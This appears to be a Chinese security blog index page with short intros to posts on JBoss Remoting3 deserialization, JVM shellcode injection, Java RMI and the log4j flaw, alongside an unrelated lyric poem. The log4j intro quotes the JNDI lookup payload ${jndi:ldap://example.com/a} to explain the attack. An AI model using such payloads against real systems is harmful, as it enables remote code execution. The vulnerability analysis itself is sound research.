前言
前段时间分析了JBoss 3873和4446端口下的反序列化,受影响的版本最晚已经是2011年发布的,而JBoss EAP 6.X及WildFly\JBoss AS 7.X等后续版本,它们反序列化相关的CVE就很少了。归根结底,是因为以上所说的后续版本弃用了原来的Remoting2协议,启用了Remoting3协议。本文以Remoting3的反序列化相关问题展开分析。
Confluence OGNL表达式注入分析(CVE-2022-26134)
JBoss remoting2协议及其反序列化分析
惊回晓梦忆秋娟
惊回晓梦,鹤唳声声,又声声寒角吹遍江城,隔岸蒹葭人寂静,废池乔木也厌言兵,昨夜醉乡难酩酊,今朝歧路未分明,樊川落魄悲同命,情到深时一死轻,重还有 约但系期无定,又怕赢得青楼薄幸名,辗转思量心自省,都系文章负我我负卿卿,估话钟鼎山林虽则皆幻影,有个风尘知已不负我生平,怎想两月绸缪如画饼,只换得一船离恨独对数峰青,正系素愿空留明珠侍聘,柔丝自缚慧剑无灵,韶华如梦终须认,争教红泪不成冰,你愿化蝶相寻但系谁为引领,你都未知何处我又要登程。
征途昼永,我又倚蓬搵,你睇荒村黄叶又近重阳,记得去年今日尚作非非想,想话神仙唔愿愿做鸳鸯,水暖春江同荡漾,不管人间离合世态炎凉,只要患难相扶欢愉共享,生时成对死亦成双,我话系前世姻缘你话系冤孽账,只怨奴奴生错一副软心肠,怕我太过多情会容易别向,遇着浮花浪蕊又话怜香,我愿忏悔往日疏狂重求你 见谅,你种真情真义令我没齿也难忘,只望青云有路人无恙,有日荣归衣锦报答红妆,个阵翠绕珠围不复当年个样,枝头飞上等你气吐名扬,今日相守都唔未能重存乜野奢望,我亦寒枝拣尽鬓染秋霜,但愿名花有主早日除魔障,愿你早日除魔障,更愿交还恩爱去礼空王。
飘零去,你都莫问前因,只见半山残照一个愁人,去路茫茫不禁悲来阵阵,前尘惘惘惹我泪落纷纷,仍是念念不忘心相印,尚有几回肠断几度销云,本想学投笔从戎图发奋,却被儒冠误了我有志难伸,想学一棹五湖同遁隐,却被妖纷笼遍远无垠,想学飞蛾破茧不复情丝困,却被一灯红焰又焚身,正系了得相思难了恨,梦来何处更为云,重讲乜石烂海枯情不泯,就算重逢有日已是负义忘恩,今日倚楼人远天涯近,呢件青衫曾染我地话别啼痕,襟前有两瓣系你唇脂晕,几度雨淋日晒而家都认唔真,你睇沉沉暮霭西风紧,南飞北雁怕向客中闻,平安未报自问心何忍,空余泪眼望断黄昏,又听得疏钟几杵好似来相引,引我都菩提树下莫恋红尘,草际秋虫声渐哽,只见隔林一点佛前灯,佛相庄严灯又暗,愧我殉情割爱两无能,虽则我佛慈悲都系难恕薄幸,甘为羁旅了却残生,世间何物堪酬赠,心耿耿,从此飘萍和断梗,能许深情默约句句都无凭。
JVM Shellcode注入探索
前言
随着RASP技术的发展,普通webshell已经很难有用武之地,甚至是各种内存马也逐渐捉襟见肘。秉承着《JSP Webshell那些事——攻击篇(上)》中向下走的思路,存不存在一种在Java代码中执行机器码的方法呢?答案是肯定的,常见的注入方式有JNI、JNA和利用JDK自带的Native方法等,其中笔者还找到了一种鲜有文章介绍的,基于HotSpot虚拟机,且较为通用的注入方法。
Java RMI攻击分析与总结
RMI简介
Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。它是由注册中心、服务端和客户端三部分组成。
注册中心
作为存储远程方法的代理对象的仓库。
服务端
暴露远程对象,并将其代理对象注册进 RMI Registry。一个代理对象在服务端中包含一个skeleton对象,用于接受来自stub对象的调用。
客户端
查找远程代理对象,远程调用服务对象。一个代理对象在调用该远程对象的客户端上包含一个stub对象,负责调用参数和返回值的序列化、打包解包,以及网络层的通讯过程。
log4j漏洞分析
前言
2021 年 12 月 10 日,Apache发布了其 Log4j 框架的 2.15.0 版,其中包括对 CVE-2021-44228 的修复,这是一个影响 Apache Log4j 2.14.1 及更早版本的关键 (CVSSv3 10) 远程代码执行 (RCE) 漏洞。该漏洞存在于 Log4j 处理器处理特制日志消息的方式中。不可信的字符串(例如,来自输入文本字段的字符串,例如 Web 应用程序搜索框)包含的内容${jndi:ldap://example.com/a},如果启用了消息查找替换,将触发远程类加载、消息查找和相关内容的执行。成功利用 CVE-2021-44228 可以让未经身份验证的远程攻击者完全控制易受攻击的目标系统。